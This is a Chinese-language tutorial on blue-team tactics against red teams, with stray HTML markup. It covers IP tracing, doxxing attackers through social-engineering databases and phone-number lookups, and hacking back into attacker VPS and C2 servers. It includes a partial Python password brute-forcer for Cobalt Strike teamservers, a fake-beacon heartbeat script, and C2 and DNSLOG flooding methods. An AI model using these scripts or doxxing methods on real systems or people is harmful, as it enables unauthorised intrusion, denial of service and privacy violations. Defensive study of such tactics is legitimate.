蓝队反制红队手法详解<\/h1>

取证反查技术<\/h2>

IP溯源技术<\/h3>

获取真实IP<\/strong><\/p>

从样本分析或流量捕获中获取攻击者真实IP<\/li>
若攻击者使用云WAF或CDN，需协调服务商获取真实IP<\/li> <\/ul> <\/li>

IP信息查询<\/strong><\/p>

Whois查询：http:\/\/ipwhois.cnnic.net.cn\/<\/code><\/li>
批量IP归属查询工具： http:\/\/ip.tool.chinaz.com\/siteip<\/code><\/li> http:\/\/www.jsons.cn\/ipbatch\/<\/code><\/li> https:\/\/ip.tool.chinaz.com\/<\/code><\/li> http:\/\/cip.cc\/<\/code><\/li> <\/ul> <\/li> 精准定位工具： https:\/\/www.ipuu.net\/<\/code><\/li> https:\/\/chaipip.com\/aiwen.html<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> 反渗透技术<\/strong><\/p> 对攻击者IP进行端口和服务探测<\/li> 尝试反渗透获取攻击者VPS信息<\/li> 国内IP可通过公安网警协助查证<\/li> <\/ul> <\/li> 威胁情报分析<\/strong><\/p> 使用威胁情报平台分析IP历史记录： https:\/\/x.threatbook.cn\/<\/code><\/li> <\/ul> <\/li> 样本分析平台： https:\/\/www.virustotal.com\/<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> 社工溯源<\/strong><\/p> 通过Whois获取邮箱、QQ、手机号<\/li> 使用社工库查询关联信息<\/li> 通过手机号关联社交账号（QQ、微信、抖音等）<\/li> 如有权限，可通过GA数据或运营商数据深入溯源<\/li> <\/ul> <\/li> <\/ol> 常见红队被反杀姿势<\/h2> 个人设备使用不当<\/strong><\/p> 使用个人工作PC进行攻击<\/li> 浏览器保存了国内主流网站登录凭据<\/li> 踩到蓝队蜜罐被JsonP劫持漏洞捕获社交ID<\/li> <\/ul> <\/li> 基础设施暴露<\/strong><\/p> 使用个人网站VPS进行扫描<\/li> VPS上含有组织HTTPS证书<\/li> VPS IP绑定的域名与安全社交ID对应<\/li> <\/ul> <\/li> 工具特征暴露<\/strong><\/p> 扫描器payload含有攻击者信息<\/li> 使用私有DNSlog<\/li> 攻击载荷含有安全社交ID或个人博客资源请求<\/li> <\/ul> <\/li> 钓鱼样本被反制<\/strong><\/p> 钓鱼邮件内木马样本被蓝队采集<\/li> 样本被逆向分析<\/li> C2服务器被反控<\/li> <\/ul> <\/li> 虚拟机逃逸<\/strong><\/p> 虚拟机逃逸暴露实体机信息<\/li> 泄露全部真实信息<\/li> <\/ul> <\/li> <\/ol> Cobalt Strike反制技术<\/h2> 1. DDOS攻击C2服务器<\/h3> 批量上线钓鱼马，启动大量进程<\/li> 使红队C2服务器瘫痪<\/li> 参考脚本：https:\/\/github.com\/Tk369\/pluginS\/blob\/master\/ll.py<\/code><\/li> <\/ul> 2. 爆破CS密码<\/h3> 红队CS通常使用弱口令<\/li> 针对Teamserver端口50050进行爆破<\/li> 爆破脚本示例：<\/li> <\/ul> #!\/usr\/bin\/env python3<\/span> <\/span><\/span>import<\/span> time,<\/span>socket,<\/span>ssl,<\/span>argparse,<\/span>concurrent.futures,<\/span>sys <\/span><\/span> <\/span><\/span># 省略部分代码...<\/span> <\/span><\/span> <\/span><\/span>def<\/span> passwordcheck<\/span>(password): <\/span><\/span> if<\/span> len(password) ><\/span> 0<\/span>: <\/span><\/span> conn =<\/span> Connector() <\/span><\/span> conn.<\/span>open(args.<\/span>host, 50050<\/span>) <\/span><\/span> payload =<\/span> bytearray(b<\/span>"<\/span>\x00\x00\xbe\xef<\/span>"<\/span>) +<\/span> len(password).<\/span>to_bytes(1<\/span>, "big"<\/span>, signed=<\/span>True<\/span>) +<\/span> bytes(bytes(password, "ascii"<\/span>).<\/span>ljust(256<\/span>, b<\/span>"A"<\/span>)) <\/span><\/span> conn.<\/span>send(payload) <\/span><\/span> if<\/span> conn.<\/span>is_connected(): result =<\/span> conn.<\/span>receive() <\/span><\/span> if<\/span> conn.<\/span>is_connected(): conn.<\/span>close() <\/span><\/span> if<\/span> result ==<\/span> bytearray(b<\/span>"<\/span>\x00\x00\xca\xfe<\/span>"<\/span>): return<\/span> password <\/span><\/span> else<\/span>: return<\/span> False<\/span> <\/span><\/span> else<\/span>: print("Do not have a blank password!!!"<\/span>) <\/span><\/span><\/code><\/pre>3. 假上线技术<\/h3> 模拟发送心跳包使攻击者无法执行命令<\/li> 示例代码：<\/li> <\/ul> # coding: utf-8<\/span> <\/span><\/span>import<\/span> re <\/span><\/span>import<\/span> time <\/span><\/span>import<\/span> requests <\/span><\/span> <\/span><\/span>def<\/span> heartbeat<\/span>(): <\/span><\/span> url =<\/span> "http:\/\/192.168.186.133:333\/activity"<\/span> <\/span><\/span> headers =<\/span> { <\/span><\/span> 'Cookie'<\/span>: 'IgyzGuIX0Jra5Ht45ZLYKyXWBnxfkNI3m6BOvExEPdWCuAv8fnY6HXKTygBOVdE34sDYusoDIjzHr\/QR32mKsoVPb5NFMCHAtC7FLQUdSsZdufXjsd2dSqkGDcaZkcQYD1BssyjGZHTy42lT8oDpga3y1z5FMGRjobeksgaMX7M='<\/span>, <\/span><\/span> 'Host'<\/span>: '192.168.186.133:333'<\/span>, <\/span><\/span> 'Accept'<\/span>: '*\/*'<\/span>, <\/span><\/span> 'Connection'<\/span>: 'Keep-Alive'<\/span>, <\/span><\/span> 'Cache-Control'<\/span>: 'no-cache'<\/span>, <\/span><\/span> 'User-Agent'<\/span>: 'Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727)'<\/span> <\/span><\/span> } <\/span><\/span> resp =<\/span> requests.<\/span>get(url=<\/span>url,headers=<\/span>headers) <\/span><\/span> text =<\/span> resp.<\/span>content.<\/span>hex() <\/span><\/span> return<\/span> text <\/span><\/span><\/code><\/pre>DNSLOG\/HTTPLOG反制技术<\/h2> DNSLOG反制<\/h3> 批量ping捕获到的DNSLOG地址<\/li> 制造大量垃圾DNSLOG数据干扰攻击者<\/li> 迫使红队废弃基础设施<\/li> <\/ul> HTTPLOG反制<\/h3> 使用爬虫节点批量请求捕获的HTTP URL<\/li> 制造大量无效请求污染日志<\/li> 使红队难以获取有效信息<\/li> <\/ul> 总结<\/h2> 蓝队反制红队的关键在于：<\/p> 完善的取证和溯源能力<\/li> 对红队基础设施的深入理解<\/li> 主动防御和反制技术<\/li> 多维度信息关联分析<\/li> <\/ol> 参考资源：<\/p> https:\/\/k8gege.org\/p\/40523.html<\/li> https:\/\/www.anquanke.com\/post\/id\/219059<\/li> https:\/\/mp.weixin.qq.com\/s\/vZzDUZsqfAZR9VRDMLXxJA<\/li> https:\/\/mp.weixin.qq.com\/s\/AZwKkEeTErPeOrkVH2Mirw<\/li> <\/ul>